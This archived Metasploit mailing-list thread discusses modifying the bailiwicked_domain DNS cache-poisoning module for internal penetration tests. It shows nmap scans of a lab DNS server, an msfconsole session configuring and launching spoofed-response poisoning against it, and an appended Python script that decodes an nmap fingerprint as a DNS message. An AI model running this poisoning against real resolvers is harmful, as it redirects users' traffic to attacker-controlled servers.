Metasploit mailing list archives

DNS cache poisoning difficulty


From: natron at invisibledenizen.org (natron)
Date: Tue, 29 Jul 2008 18:35:40 -0500

I gave a shot at implementing this and I believe it works.  You now
have an optional variable where you can set the DNS servers
arbitrarily.  When set, it'll skip the authoritative checks and only
use your DNS server list.  You'd probably only want to use this if you
were internal.  An example scenario would be:

client --> AD server --> authoritative company DNS resolver -->
internet DNS servers

This would be for attacking "AD server" when you know "authoritative
company DNS resolver" as well as the "AD Server" source port used to
communicate with the resolver.

I've also found that when doing an nmap -sU -sV scan against an AD DNS
server, the port AD is using to forward is returning junk nmap doesn't
know what to do with (well, at least my version of nmap -- I didn't
try an upgrade).  See the examples below.  You'll notice that the
first scan is gibberish, but scans 2 - 4 all contain the string
"root-servers".  FYI, this is running against Windows 2003 under
VMWare ESX (obviously without MS08-037 applied).

Please test this, someone, to see if it's working properly in your
environment.  It looks like it's working correctly when I monitor it
in wireshark, but I've been unsuccessful in poisoning the local cache.
I believe this to be a combination of the short race time on a LAN
and my inherent impatience.

Bugs: I don't believe the racer functionality is working for some
reason; I'm not sure what I broke.  I have to set the XIDS manually
or it loops on the racer check.

Nathan

Example:

[root at localhost dns]# nmap -sU -sV -p- 172.16.1.251

Starting Nmap 4.68 ( http://nmap.org ) at 2008-07-16 07:25 CDT
Interesting ports on 172.16.1.251:
Not shown: 65519 closed ports
PORT     STATE         SERVICE      VERSION
53/udp   open          domain       Microsoft DNS
88/udp   open|filtered kerberos-sec
123/udp  open          ntp          NTP v3
137/udp  open          netbios-ns   Microsoft Windows NT netbios-ssn
(workgroup: xxxxxxxx)
138/udp  open|filtered netbios-dgm
389/udp  open|filtered ldap
445/udp  open|filtered microsoft-ds
464/udp  open|filtered kpasswd5
500/udp  open|filtered isakmp
1029/udp open|filtered unknown
1033/udp open          unknown
1218/udp open|filtered unknown
1225/udp open|filtered unknown
1234/udp open|filtered unknown
1434/udp open          ms-sql-m     Microsoft SQL Server 8.00.194
(ServerName: xxxx; TCPPort: xxxx)
4500/udp open|filtered sae-urn
1 service unrecognized despite returning data. If you know the
service/version, please submit the following fingerprint at
http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port1033-UDP:V=4.68%I=7%D=7/16%Time=487DE8CB%P=i686-pc-linux-gnu%r(NBTS
SF:tat,1E1,"\x80\xf0\x80\x80\0\x01\0\0\0\r\0\r\x20CKAAAAAAAAAAAAAAAAAAAAAA
SF:AAAAAAAA\0\0!\0\x01\0\0\x02\0\x01\0\x01F<\0\x14\x01a\x0croot-servers\x0
SF:3net\0\xc02\0\x02\0\x01\0\x01F<\0\x04\x01b\xc0\?\xc02\0\x02\0\x01\0\x01
SF:F<\0\x04\x01c\xc0\?\xc02\0\x02\0\x01\0\x01F<\0\x04\x01d\xc0\?\xc02\0\x0
SF:2\0\x01\0\x01F<\0\x04\x01e\xc0\?\xc02\0\x02\0\x01\0\x01F<\0\x04\x01f\xc
SF:0\?\xc02\0\x02\0\x01\0\x01F<\0\x04\x01g\xc0\?\xc02\0\x02\0\x01\0\x01F<\
SF:0\x04\x01h\xc0\?\xc02\0\x02\0\x01\0\x01F<\0\x04\x01i\xc0\?\xc02\0\x02\0
SF:\x01\0\x01F<\0\x04\x01j\xc0\?\xc02\0\x02\0\x01\0\x01F<\0\x04\x01k\xc0\?
SF:\xc02\0\x02\0\x01\0\x01F<\0\x04\x01l\xc0\?\xc02\0\x02\0\x01\0\x01F<\0\x
SF:04\x01m\xc0\?\xc0=\0\x01\0\x01\0\x01F<\0\x04\xc6\)\0\x04\xc0\]\0\x01\0\
SF:x01\0\x01F<\0\x04\xc0\xe4O\xc9\xc0m\0\x01\0\x01\0\x01F<\0\x04\xc0!\x04\
SF:x0c\xc0}\0\x01\0\x01\0\x01F<\0\x04\x80\x08\nZ\xc0\x8d\0\x01\0\x01\0\x01
SF:F<\0\x04\xc0\xcb\xe6\n\xc0\x9d\0\x01\0\x01\0\x01F<\0\x04\xc0\x05\x05\xf
SF:1\xc0\xad\0\x01\0\x01\0\x01F<\0\x04\xc0p\$\x04\xc0\xbd\0\x01\0\x01\0\x0
SF:1FB\0\x04\x80\?\x025\xc0\xcd\0\x01\0\x01\0\x01F<\0\x04\xc0\$\x94\x11\xc
SF:0\xdd\0\x01\0\x01\0\x01F<\0\x04\xc0:\x80\x1e\xc0\xed\0\x01\0\x01\0\x01F
SF:<\0\x04\xc1\0\x0e\x81\xc0\xfd\0\x01\0\x01\0\x01F<\0\x04\xc7\x07S\*\xc1\
SF:r\0\x01\0\x01\0\x01F<\0\x04\xca\x0c\x1b!");
MAC Address: 00:0C:29:A7:D4:3C (VMware)
Service Info: Host: ZEUS; OS: Windows

Service detection performed. Please report any incorrect results at
http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 122.822 seconds
[root at localhost dns]# nmap -sU -sV -p1033 172.16.1.251

Starting Nmap 4.68 ( http://nmap.org ) at 2008-07-16 07:27 CDT
Interesting ports on 172.16.1.251:
PORT     STATE SERVICE VERSION
1033/udp open  unknown
1 service unrecognized despite returning data. If you know the
service/version, please submit the following fingerprint at
http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port1033-UDP:V=4.68%I=7%D=7/16%Time=487DE94A%P=i686-pc-linux-gnu%r(RPCC
SF:heck,28,"r\xfe\x9d\x04\0\0\0\0\0\0\0\x02\0\x01\x86\xa0\0\x01\x97\|\0\0\
SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0")%r(NBTStat,1E1,"\x80\xf0\x80\x80\0
SF:\x01\0\0\0\r\0\r\x20CKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\0\0!\0\x01\0\0\x02
SF:\0\x01\0\x01E\xaf\0\x14\x01a\x0croot-servers\x03net\0\xc02\0\x02\0\x01\
SF:0\x01E\xaf\0\x04\x01b\xc0\?\xc02\0\x02\0\x01\0\x01E\xaf\0\x04\x01c\xc0\
SF:?\xc02\0\x02\0\x01\0\x01E\xaf\0\x04\x01d\xc0\?\xc02\0\x02\0\x01\0\x01E\
SF:xaf\0\x04\x01e\xc0\?\xc02\0\x02\0\x01\0\x01E\xaf\0\x04\x01f\xc0\?\xc02\
SF:0\x02\0\x01\0\x01E\xaf\0\x04\x01g\xc0\?\xc02\0\x02\0\x01\0\x01E\xaf\0\x
SF:04\x01h\xc0\?\xc02\0\x02\0\x01\0\x01E\xaf\0\x04\x01i\xc0\?\xc02\0\x02\0
SF:\x01\0\x01E\xaf\0\x04\x01j\xc0\?\xc02\0\x02\0\x01\0\x01E\xaf\0\x04\x01k
SF:\xc0\?\xc02\0\x02\0\x01\0\x01E\xaf\0\x04\x01l\xc0\?\xc02\0\x02\0\x01\0\
SF:x01E\xaf\0\x04\x01m\xc0\?\xc0=\0\x01\0\x01\0\x01E\xaf\0\x04\xc6\)\0\x04
SF:\xc0\]\0\x01\0\x01\0\x01E\xaf\0\x04\xc0\xe4O\xc9\xc0m\0\x01\0\x01\0\x01
SF:E\xaf\0\x04\xc0!\x04\x0c\xc0}\0\x01\0\x01\0\x01E\xaf\0\x04\x80\x08\nZ\x
SF:c0\x8d\0\x01\0\x01\0\x01E\xaf\0\x04\xc0\xcb\xe6\n\xc0\x9d\0\x01\0\x01\0
SF:\x01E\xaf\0\x04\xc0\x05\x05\xf1\xc0\xad\0\x01\0\x01\0\x01E\xaf\0\x04\xc
SF:0p\$\x04\xc0\xbd\0\x01\0\x01\0\x01E\xb5\0\x04\x80\?\x025\xc0\xcd\0\x01\
SF:0\x01\0\x01E\xaf\0\x04\xc0\$\x94\x11\xc0\xdd\0\x01\0\x01\0\x01E\xaf\0\x
SF:04\xc0:\x80\x1e\xc0\xed\0\x01\0\x01\0\x01E\xaf\0\x04\xc1\0\x0e\x81\xc0\
SF:xfd\0\x01\0\x01\0\x01E\xaf\0\x04\xc7\x07S\*\xc1\r\0\x01\0\x01\0\x01E\xa
SF:f\0\x04\xca\x0c\x1b!");
MAC Address: 00:0C:29:A7:D4:3C (VMware)

[root at localhost dns]# nmap -sU -sV -p1033 172.16.1.251

Starting Nmap 4.68 ( http://nmap.org ) at 2008-07-16 07:40 CDT
Interesting ports on 172.16.1.251:
PORT     STATE SERVICE VERSION
1033/udp open  unknown
1 service unrecognized despite returning data. If you know the
service/version, please submit the following fingerprint at
http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port1033-UDP:V=4.68%I=7%D=7/16%Time=487DEC45%P=i686-pc-linux-gnu%r(RPCC
SF:heck,28,"r\xfe\x9d\x04\0\0\0\0\0\0\0\x02\0\x01\x86\xa0\0\x01\x97\|\0\0\
SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0")%r(NBTStat,1E1,"\x80\xf0\x80\x80\0
SF:\x01\0\0\0\r\0\r\x20CKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\0\0!\0\x01\0\0\x02
SF:\0\x01\0\x01B\xb4\0\x14\x01a\x0croot-servers\x03net\0\xc02\0\x02\0\x01\
SF:0\x01B\xb4\0\x04\x01b\xc0\?\xc02\0\x02\0\x01\0\x01B\xb4\0\x04\x01c\xc0\
SF:?\xc02\0\x02\0\x01\0\x01B\xb4\0\x04\x01d\xc0\?\xc02\0\x02\0\x01\0\x01B\
SF:xb4\0\x04\x01e\xc0\?\xc02\0\x02\0\x01\0\x01B\xb4\0\x04\x01f\xc0\?\xc02\
SF:0\x02\0\x01\0\x01B\xb4\0\x04\x01g\xc0\?\xc02\0\x02\0\x01\0\x01B\xb4\0\x
SF:04\x01h\xc0\?\xc02\0\x02\0\x01\0\x01B\xb4\0\x04\x01i\xc0\?\xc02\0\x02\0
SF:\x01\0\x01B\xb4\0\x04\x01j\xc0\?\xc02\0\x02\0\x01\0\x01B\xb4\0\x04\x01k
SF:\xc0\?\xc02\0\x02\0\x01\0\x01B\xb4\0\x04\x01l\xc0\?\xc02\0\x02\0\x01\0\
SF:x01B\xb4\0\x04\x01m\xc0\?\xc0=\0\x01\0\x01\0\x01B\xb4\0\x04\xc6\)\0\x04
SF:\xc0\]\0\x01\0\x01\0\x01B\xb4\0\x04\xc0\xe4O\xc9\xc0m\0\x01\0\x01\0\x01
SF:B\xb4\0\x04\xc0!\x04\x0c\xc0}\0\x01\0\x01\0\x01B\xb4\0\x04\x80\x08\nZ\x
SF:c0\x8d\0\x01\0\x01\0\x01B\xb4\0\x04\xc0\xcb\xe6\n\xc0\x9d\0\x01\0\x01\0
SF:\x01B\xb4\0\x04\xc0\x05\x05\xf1\xc0\xad\0\x01\0\x01\0\x01B\xb4\0\x04\xc
SF:0p\$\x04\xc0\xbd\0\x01\0\x01\0\x01B\xba\0\x04\x80\?\x025\xc0\xcd\0\x01\
SF:0\x01\0\x01B\xb4\0\x04\xc0\$\x94\x11\xc0\xdd\0\x01\0\x01\0\x01B\xb4\0\x
SF:04\xc0:\x80\x1e\xc0\xed\0\x01\0\x01\0\x01B\xb4\0\x04\xc1\0\x0e\x81\xc0\
SF:xfd\0\x01\0\x01\0\x01B\xb4\0\x04\xc7\x07S\*\xc1\r\0\x01\0\x01\0\x01B\xb
SF:4\0\x04\xca\x0c\x1b!");
MAC Address: 00:0C:29:A7:D4:3C (VMware)

Service detection performed. Please report any incorrect results at
http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 55.617 seconds

[root at localhost dns]# nmap -sU -sV -p1033 172.16.1.251

Starting Nmap 4.68 ( http://nmap.org ) at 2008-07-16 07:43 CDT
Interesting ports on 172.16.1.251:
PORT     STATE SERVICE VERSION
1033/udp open  unknown
1 service unrecognized despite returning data. If you know the
service/version, please submit the following fingerprint at
http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port1033-UDP:V=4.68%I=7%D=7/16%Time=487DECDA%P=i686-pc-linux-gnu%r(RPCC
SF:heck,28,"r\xfe\x9d\x04\0\0\0\0\0\0\0\x02\0\x01\x86\xa0\0\x01\x97\|\0\0\
SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0")%r(NBTStat,1E1,"\x80\xf0\x80\x80\0
SF:\x01\0\0\0\r\0\r\x20CKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\0\0!\0\x01\0\0\x02
SF:\0\x01\0\x01B\x1f\0\x14\x01a\x0croot-servers\x03net\0\xc02\0\x02\0\x01\
SF:0\x01B\x1f\0\x04\x01b\xc0\?\xc02\0\x02\0\x01\0\x01B\x1f\0\x04\x01c\xc0\
SF:?\xc02\0\x02\0\x01\0\x01B\x1f\0\x04\x01d\xc0\?\xc02\0\x02\0\x01\0\x01B\
SF:x1f\0\x04\x01e\xc0\?\xc02\0\x02\0\x01\0\x01B\x1f\0\x04\x01f\xc0\?\xc02\
SF:0\x02\0\x01\0\x01B\x1f\0\x04\x01g\xc0\?\xc02\0\x02\0\x01\0\x01B\x1f\0\x
SF:04\x01h\xc0\?\xc02\0\x02\0\x01\0\x01B\x1f\0\x04\x01i\xc0\?\xc02\0\x02\0
SF:\x01\0\x01B\x1f\0\x04\x01j\xc0\?\xc02\0\x02\0\x01\0\x01B\x1f\0\x04\x01k
SF:\xc0\?\xc02\0\x02\0\x01\0\x01B\x1f\0\x04\x01l\xc0\?\xc02\0\x02\0\x01\0\
SF:x01B\x1f\0\x04\x01m\xc0\?\xc0=\0\x01\0\x01\0\x01B\x1f\0\x04\xc6\)\0\x04
SF:\xc0\]\0\x01\0\x01\0\x01B\x1f\0\x04\xc0\xe4O\xc9\xc0m\0\x01\0\x01\0\x01
SF:B\x1f\0\x04\xc0!\x04\x0c\xc0}\0\x01\0\x01\0\x01B\x1f\0\x04\x80\x08\nZ\x
SF:c0\x8d\0\x01\0\x01\0\x01B\x1f\0\x04\xc0\xcb\xe6\n\xc0\x9d\0\x01\0\x01\0
SF:\x01B\x1f\0\x04\xc0\x05\x05\xf1\xc0\xad\0\x01\0\x01\0\x01B\x1f\0\x04\xc
SF:0p\$\x04\xc0\xbd\0\x01\0\x01\0\x01B%\0\x04\x80\?\x025\xc0\xcd\0\x01\0\x
SF:01\0\x01B\x1f\0\x04\xc0\$\x94\x11\xc0\xdd\0\x01\0\x01\0\x01B\x1f\0\x04\
SF:xc0:\x80\x1e\xc0\xed\0\x01\0\x01\0\x01B\x1f\0\x04\xc1\0\x0e\x81\xc0\xfd
SF:\0\x01\0\x01\0\x01B\x1f\0\x04\xc7\x07S\*\xc1\r\0\x01\0\x01\0\x01B\x1f\0
SF:\x04\xca\x0c\x1b!");
MAC Address: 00:0C:29:A7:D4:3C (VMware)

Service detection performed. Please report any incorrect results at
http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 55.623 seconds

[root at localhost msf-dev]# ./msfconsole

                                  _
                                 | |      o
 _  _  _    _ _|_  __,   ,    _  | |  __    _|_
/ |/ |/ |  |/  |  /  |  / \_|/ \_|/  /  \_|  |
  |  |  |_/|__/|_/\_/|_/ \/ |__/ |__/\__/ |_/|_/
                           /|
                           \|


       =[ msf v3.2-release
+ -- --=[ 299 exploits - 124 payloads
+ -- --=[ 18 encoders - 6 nops
       =[ 68 aux

msf auxiliary(bailiwicked_domain) > set DOMAIN invisibledenizen.org
DOMAIN => invisibledenizen.org
msf auxiliary(bailiwicked_domain) > set SRCPORT 1033
SRCPORT => 1033
msf auxiliary(bailiwicked_domain) > set SRCDNS "172.16.1.1, 10.10.10.10"
SRCDNS => 172.16.1.1, 10.10.10.10
msf auxiliary(bailiwicked_domain) > set SRCDNS 172.16.1.1
SRCDNS => 172.16.1.1
msf auxiliary(bailiwicked_domain) > set XIDS 20
XIDS => 20
msf auxiliary(bailiwicked_domain) > set NEWDNS fakedns.visibledenizens.org
NEWDNS => fakedns.visibledenizens.org
msf auxiliary(bailiwicked_domain) > show options

Module options:

   Name     Current Setting              Required  Description
   ----     ---------------              --------  -----------
   DOMAIN   invisibledenizen.org         yes       The domain to hijack
   NEWDNS   fakedns.visibledenizens.org  yes       The hostname of the
replacement DNS server
   RECONS   208.67.222.222               yes       The nameserver used
for reconnaissance
   RHOST    172.16.1.251                 yes       The target address
   SRCADDR  Real                         yes       The source address
to use for sending the queries (accepted: Real, Random)
   SRCDNS   172.16.1.1                   no        An optional list of
DNS servers to spoof as ("10.1.1.1, 10.2.2.2" format)
   SRCPORT  1033                         yes       The target server's
source query port (0 for automatic)
   TTL      34282                        yes       The TTL for the
malicious host entry
   XIDS     20                           yes       The number of XIDs
to try for each query (0 for automatic)

msf auxiliary(bailiwicked_domain) > save
Saved configuration to: /root/.msf3/config
msf auxiliary(bailiwicked_domain) > run
[*] Targeting nameserver 172.16.1.251 for injection of
invisibledenizen.org. nameservers as fakedns.visibledenizens.org
[*] Added 172.16.1.1 into list of domains to spoof as.
[*] Attempting to inject poison records for invisibledenizen.org.'s
nameservers into 172.16.1.251:1033...
[*] Sent 1000 queries and 20000 spoofed responses...
[*] Sent 2000 queries and 40000 spoofed responses...
[*] Sent 3000 queries and 60000 spoofed responses...
[*] Sent 4000 queries and 80000 spoofed responses...
[*] Sent 5000 queries and 100000 spoofed responses...

On Tue, Jul 29, 2008 at 2:21 PM, H D Moore <hdm at metasploit.com> wrote:

With your setup, the exploits won't work. You could modify the exploit
locally, remove the authoritative checks, and hardcode barbs =
[ "ip1", "ip2", "ip3"]. Alternatively, add a new option to specify the
list of nameservers to spoof and submit the patch :-)

On Tuesday 29 July 2008, Sat Jagat Singh wrote:
In testing the spoof/dns/bailiwicked_host (and also bailiwicked_domain)
modules on an internal penetration test I have encountered a challenge
with firewall filtering of egress to external DNS servers.  Let me be
clear, I am on the LAN.  DNS traffic is not permitted out to the
internet except from the organization's own internal DNS servers that
perform recursive queries for internal users.

Metasploit gets to a point where it attempts to query yahoo's
nameserver for authoritativeness and just hangs since the traffic gets
dropped at the firewall.

Any suggestions?
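The nmap fingerprints earlier in this message show that the "junk" coming back from 1033/udp is a well-formed DNS message: the server echoed the probe's transaction ID, treated nmap's NBTStat probe as a question of type 33, and attached a referral to the thirteen root servers with their glue addresses. The script below is an added example, not code from this thread, from nmap or from Metasploit. It decodes the first fingerprint from nmap's escaped text and parses it as a DNS message, so someone reviewing scan output can tell a resolver's outbound query socket sitting on a fixed high port apart from a genuinely unknown service. The fingerprint text is copied from the first scan above with the "SF:" prefixes removed; the function names, the escape table and the summary fields are this example's own.

```python
"""Decode an nmap service fingerprint and parse its payload as a DNS message.

Added example for the thread above; not nmap's, Metasploit's or the poster's
code. Only the fingerprint text comes from the post.
"""
import struct

# %r(NBTStat,1E1,"...") body of the first scan, "SF:" prefixes stripped.
# nmap wraps fingerprints at a fixed width, so the fragments are re-joined.
NMAP_FP = r"""
\x80\xf0\x80\x80\0\x01\0\0\0\r\0\r\x20CKAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAA\0\0!\0\x01\0\0\x02\0\x01\0\x01F<\0\x14\x01a\x0croot-servers\x0
3net\0\xc02\0\x02\0\x01\0\x01F<\0\x04\x01b\xc0\?\xc02\0\x02\0\x01\0\x01
F<\0\x04\x01c\xc0\?\xc02\0\x02\0\x01\0\x01F<\0\x04\x01d\xc0\?\xc02\0\x0
2\0\x01\0\x01F<\0\x04\x01e\xc0\?\xc02\0\x02\0\x01\0\x01F<\0\x04\x01f\xc
0\?\xc02\0\x02\0\x01\0\x01F<\0\x04\x01g\xc0\?\xc02\0\x02\0\x01\0\x01F<\
0\x04\x01h\xc0\?\xc02\0\x02\0\x01\0\x01F<\0\x04\x01i\xc0\?\xc02\0\x02\0
\x01\0\x01F<\0\x04\x01j\xc0\?\xc02\0\x02\0\x01\0\x01F<\0\x04\x01k\xc0\?
\xc02\0\x02\0\x01\0\x01F<\0\x04\x01l\xc0\?\xc02\0\x02\0\x01\0\x01F<\0\x
04\x01m\xc0\?\xc0=\0\x01\0\x01\0\x01F<\0\x04\xc6\)\0\x04\xc0\]\0\x01\0\
x01\0\x01F<\0\x04\xc0\xe4O\xc9\xc0m\0\x01\0\x01\0\x01F<\0\x04\xc0!\x04\
x0c\xc0}\0\x01\0\x01\0\x01F<\0\x04\x80\x08\nZ\xc0\x8d\0\x01\0\x01\0\x01
F<\0\x04\xc0\xcb\xe6\n\xc0\x9d\0\x01\0\x01\0\x01F<\0\x04\xc0\x05\x05\xf
1\xc0\xad\0\x01\0\x01\0\x01F<\0\x04\xc0p\$\x04\xc0\xbd\0\x01\0\x01\0\x0
1FB\0\x04\x80\?\x025\xc0\xcd\0\x01\0\x01\0\x01F<\0\x04\xc0\$\x94\x11\xc
0\xdd\0\x01\0\x01\0\x01F<\0\x04\xc0:\x80\x1e\xc0\xed\0\x01\0\x01\0\x01F
<\0\x04\xc1\0\x0e\x81\xc0\xfd\0\x01\0\x01\0\x01F<\0\x04\xc7\x07S\*\xc1\
r\0\x01\0\x01\0\x01F<\0\x04\xca\x0c\x1b!
"""

ESCAPES = {"0": 0, "n": 10, "r": 13, "t": 9}   # single-letter escapes nmap emits


def decode_nmap_fp(text: str) -> bytes:
    """Turn nmap's escaped fingerprint text back into the raw bytes it saw."""
    s = "".join(text.split())                 # drop the line wrapping
    out, i = bytearray(), 0
    while i < len(s):
        if s[i] != "\\":
            out.append(ord(s[i])); i += 1
        elif s[i + 1] == "x":                 # \xHH
            out.append(int(s[i + 2:i + 4], 16)); i += 4
        elif s[i + 1] in ESCAPES:             # \0 \n \r \t
            out.append(ESCAPES[s[i + 1]]); i += 2
        else:                                 # \? \) \] \$ \* : regex metachars nmap escapes
            out.append(ord(s[i + 1])); i += 2
    return bytes(out)


def read_name(msg: bytes, off: int):
    """Read a possibly compressed domain name; return (name, offset after it)."""
    labels, end, hops = [], None, 0
    while True:
        length = msg[off]
        if length & 0xC0 == 0xC0:             # compression pointer (RFC 1035 4.1.4)
            end = off + 2 if end is None else end
            off, hops = ((length & 0x3F) << 8) | msg[off + 1], hops + 1
            if hops > 64:
                raise ValueError("compression pointer loop")
            continue
        off += 1
        if length == 0:
            break
        labels.append(msg[off:off + length].decode("ascii"))
        off += length
    return ".".join(labels) or ".", (off if end is None else end)


def parse_dns(msg: bytes) -> dict:
    """Parse header, question and the answer/authority/additional sections."""
    xid, flags, qd, an, ns, ar = struct.unpack("!HHHHHH", msg[:12])
    off, questions = 12, []
    for _ in range(qd):
        name, off = read_name(msg, off)
        qtype, qclass = struct.unpack("!HH", msg[off:off + 4])
        off += 4
        questions.append((name, qtype, qclass))
    result = {"xid": xid, "flags": flags, "questions": questions}
    for section, count in (("answer", an), ("authority", ns), ("additional", ar)):
        rrs = []
        for _ in range(count):
            name, off = read_name(msg, off)
            rtype, _cls, ttl, rdlen = struct.unpack("!HHIH", msg[off:off + 10])
            off += 10
            if rtype == 2:                    # NS: rdata is a (compressed) name
                value, _ = read_name(msg, off)
            elif rtype == 1 and rdlen == 4:   # A: rdata is an IPv4 address
                value = ".".join(str(b) for b in msg[off:off + 4])
            else:
                value = msg[off:off + rdlen].hex()
            off += rdlen
            rrs.append({"name": name, "type": rtype, "ttl": ttl, "value": value})
        result[section] = rrs
    result["length"] = off                    # should equal len(msg) for a clean parse
    return result


if __name__ == "__main__":
    packet = decode_nmap_fp(NMAP_FP)
    r = parse_dns(packet)
    print(f"{len(packet)} bytes, xid={r['xid']:#06x}, flags={r['flags']:#06x}, "
          f"QR={r['flags'] >> 15}, RA={(r['flags'] >> 7) & 1}")
    for rr in r["additional"]:
        print(f"  {rr['name']:<22} {rr['value']}")
```

Run stand-alone it lists the thirteen root-server glue records, with QR set and RA set: a resolver answered on the port it also uses for its own outbound queries, which is exactly the fixed query port that source-port randomization (MS08-037 on this host) is meant to remove. The same decoder works on the RPCCheck and NBTStat bodies of scans 2 to 4, since nmap uses the same escaping there.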


-------------- next part --------------
A non-text attachment was scrubbed...
Name: bailiwicked_domain.patch
Type: text/x-diff
Size: 5119 bytes
Desc: not available
URL: <http://mail.metasploit.com/pipermail/framework/attachments/20080729/8f45326e/attachment.patch>